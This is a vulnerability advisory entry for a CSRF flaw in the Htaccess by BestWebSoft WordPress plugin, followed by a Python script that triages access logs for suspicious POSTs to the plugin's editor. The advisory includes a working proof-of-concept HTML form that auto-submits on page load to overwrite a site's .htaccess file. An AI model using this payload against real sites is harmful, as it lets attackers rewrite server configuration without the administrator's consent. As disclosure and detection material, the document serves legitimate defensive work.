wpexploit | Wpvulndb | WPEX-ID:77165939-B599-47D0-877B-A739A8E0FC49
History: Feb 01, 2020 - 12:00 a.m.

Htaccess by BestWebSoft < 1.8.2 - CSRF to edit .htaccess

2020-02-01 00:00:00
wpvulndb
EPSS: 0.003 (Low), percentile 71.5%

The Htaccess by BestWebSoft WordPress plugin before 1.8.2 was affected by a cross-site request forgery (CSRF) vulnerability that allows the .htaccess file to be edited.

<html>
    <body onload="document.forms[0].submit();">
        <form action="https://[WP]/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" method="POST">
            <input type="hidden" name="htccss_customise" value="# Modified by CSRF" />
            <input type="hidden" name="htccss_form_custom" value="submit" />
            <input type="hidden" name="htccss_submit_button_custom" value="Save+Changes" />
            <input type="hidden" name="htccss_nonce_name" value="attacker" />
            <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" />
        </form>
    </body>
</html> 
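
A log-triage check for the request shown above, as an added example that is not part of the original advisory: it scans web-server access logs (Combined Log Format assumed) for POSTs to the plugin's editor endpoint whose Referer header is missing or points off-site. The host `blog.example`, the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def is_editor_post(method, target):
    """True for a POST to the plugin's .htaccess editor endpoint (path as given in the advisory)."""
    url = urlsplit(target)
    qs = parse_qs(url.query)
    return (method == "POST"
            and url.path.endswith("/wp-admin/admin.php")
            and qs.get("page") == ["htaccess.php"]
            and qs.get("action") == ["htaccess_editor"])

def suspicious_editor_posts(lines, site_host):
    """Return (time, ip, referer) for editor POSTs whose Referer is missing or off-site."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or not is_editor_post(m["method"], m["target"]):
            continue
        ref = m["referer"]
        # "-" or empty means the browser sent no Referer header.
        ref_host = urlsplit(ref).hostname if ref not in ("", "-") else None
        if ref_host != site_host.lower():
            hits.append((m["time"], m["ip"], ref))
    return hits

# Constructed sample log lines (not taken from the advisory); the site is assumed to be blog.example.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Feb/2020:10:00:01 +0000] "POST /wp-admin/admin.php?page=htaccess.php&action=htaccess_editor HTTP/1.1" 200 5120 "https://blog.example/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" "Mozilla/5.0"',
    '198.51.100.23 - - [01/Feb/2020:10:05:12 +0000] "POST /wp-admin/admin.php?page=htaccess.php&action=htaccess_editor HTTP/1.1" 200 5120 "https://other.example/promo.html" "Mozilla/5.0"',
    '198.51.100.23 - - [01/Feb/2020:10:07:40 +0000] "POST /wp-admin/admin.php?page=htaccess.php&action=htaccess_editor HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [01/Feb/2020:10:08:02 +0000] "GET /wp-admin/admin.php?page=htaccess.php&action=htaccess_editor HTTP/1.1" 200 9000 "https://other.example/promo.html" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Feb/2020:10:09:30 +0000] "POST /wp-admin/admin.php?page=other-plugin.php HTTP/1.1" 200 800 "https://other.example/promo.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_editor_posts(SAMPLE_LOG, "blog.example"):
        print(hit)
```

A missing Referer can also result from a strict referrer policy or privacy tooling, so treat hits as triage leads and correlate them with changes to the site's `.htaccess` file.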
